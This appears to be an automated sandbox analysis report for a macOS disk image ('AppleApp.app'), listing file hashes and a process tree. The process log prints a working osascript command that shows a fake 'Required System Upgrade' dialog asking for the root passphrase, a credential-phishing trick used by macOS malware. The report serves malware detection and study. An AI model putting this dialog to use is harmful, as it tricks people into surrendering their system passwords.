36e8ee02a3fb09ba7d2fdf382486f616610c667bdab4cc429decff6eba0e6427

Analysis

max time kernel
131s
max time network
132s
platform
macos_amd64
resource
macos-20220504-en
resource tags

arch:amd64arch:i386image:macos-20220504-enkernel:19b77alocale:en-usos:macos-10.15-amd64system
submitted
04/10/2023, 17:41

Target

36e8ee02a3fb09ba7d2fdf382486f616610c667bdab4cc429decff6eba0e6427_JC.dmg
Size

500KB
MD5

b77f474548189d0acf35ee23f0bf87b3
SHA1

cc0b08e9035b0cd33d9ee49b1fd9449bad6978eb
SHA256

36e8ee02a3fb09ba7d2fdf382486f616610c667bdab4cc429decff6eba0e6427
SHA512

24dc42000c68f04feab73de2f73ca620b1e9e9ab0df5e509502489314da1aa631d1e7fe89ca1be6835105a53d76e439c343e77b6a0e9f032e5042a3504cb03bf
SSDEEP

12288:WXoJfAycbXpNU0bamorfNq4dYU1Uu65dRvwB1na+XyEfrWEN7wr:U9hbjtbrorFq0YUKLaXn3yhE

Score

1^/10

/bin/sh
sh -c "sudo /bin/zsh -c \"open /Volumes/source_folder/AppleApp.app\""
1⤵
PID:528

/bin/bash
sh -c "sudo /bin/zsh -c \"open /Volumes/source_folder/AppleApp.app\""
1⤵
PID:528

/bin/bash
sh -c "sudo /bin/zsh -c \"open /Volumes/source_folder/AppleApp.app\""
1⤵
PID:528

/usr/bin/sudo
sudo /bin/zsh -c "open /Volumes/source_folder/AppleApp.app"
1⤵
PID:528

/usr/bin/sudo
sudo /bin/zsh -c "open /Volumes/source_folder/AppleApp.app"
1⤵
PID:528
- /bin/zsh
  /bin/zsh -c "open /Volumes/source_folder/AppleApp.app"
  2⤵
  PID:529
- /bin/zsh
  /bin/zsh -c "open /Volumes/source_folder/AppleApp.app"
  2⤵
  PID:529
- /usr/bin/open
  open /Volumes/source_folder/AppleApp.app
  2⤵
  PID:529
- /usr/bin/open
  open /Volumes/source_folder/AppleApp.app
  2⤵
  PID:529

/usr/libexec/xpcproxy
xpcproxy com.apple.xpc.launchd.oneshot.0x10000002.AppleApp
1⤵
PID:530

/Volumes/source_folder/AppleApp.app/Contents/MacOS/AppleApp
/Volumes/source_folder/AppleApp.app/Contents/MacOS/AppleApp -psn_0_159783
1⤵
PID:530

/bin/sh
sh -c "osascript -e 'display dialog \"Required System Upgrade. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"
1⤵
PID:533

/bin/bash
sh -c "osascript -e 'display dialog \"Required System Upgrade. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"
1⤵
PID:533

/bin/bash
sh -c "osascript -e 'display dialog \"Required System Upgrade. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"
1⤵
PID:533

/usr/bin/osascript
osascript -e "display dialog \"Required System Upgrade. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer"
1⤵
PID:533

/usr/bin/osascript
osascript -e "display dialog \"Required System Upgrade. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer"
1⤵
PID:533